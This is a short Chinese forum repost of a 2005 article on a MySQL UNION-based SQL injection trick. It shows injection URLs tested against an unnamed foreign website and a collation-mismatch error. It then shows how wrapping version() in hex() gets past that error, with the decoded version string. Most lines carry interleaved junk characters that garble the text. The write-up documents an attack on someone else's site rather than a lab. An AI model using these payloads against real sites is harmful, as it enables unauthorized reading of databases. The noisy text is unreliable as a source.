本文作者:SuperHei" }+ @8 Q4 C! c8 Y
文章性质:原创
! f8 H; W# s y发布日期:2005-10-18
' F: N5 L6 O* X1 [测试个国外的站时:
' Q6 X- D; P; E2 ~4 K+ w& y4 P, Kurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
' ?2 k- @4 s, l7 Z返回错误:
( a1 H$ w+ l/ ~Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'7 n9 z# Q: c2 u; v2 P# ]
MySQL Error No. 1261 _/ Z5 S- _2 f" l J
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。' M+ `5 }, d ? I4 K
解决办法:转为其他编码如hex。
- o0 X; Q4 ~6 H% g" w! surl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
7 x& p9 X& b" H( H成功得到hex(version())的值为:4 a' P1 A( c. J) w1 E
342E312E332D62657461
1 L5 Z% H+ _ G0 }* c% O回Mysql查询下得到:4 h# y1 {5 l i4 q2 q
mysql> select 0x342E312E332D62657461;
4 G, U* i8 ?/ c, ^5 r M9 L1 n( |+------------------------+
7 A% H7 T& W& c| 0x342E312E332D62657461 |
3 O6 B9 D1 r' i( j6 v4 W9 v' ^+------------------------+
0 g6 t7 ^) U* Z3 ^( \3 P| 4.1.3-beta |1 M" {5 B0 U% V; C
+------------------------+
4 S% L7 o7 d' o6 D1 row in set (0.00 sec)
" [# H. l6 x3 ~- a# n' Q! p4 w3 k
. o& w9 Q. K5 c' V |
发表于 2012-9-15 14:04:54
收藏
支持
反对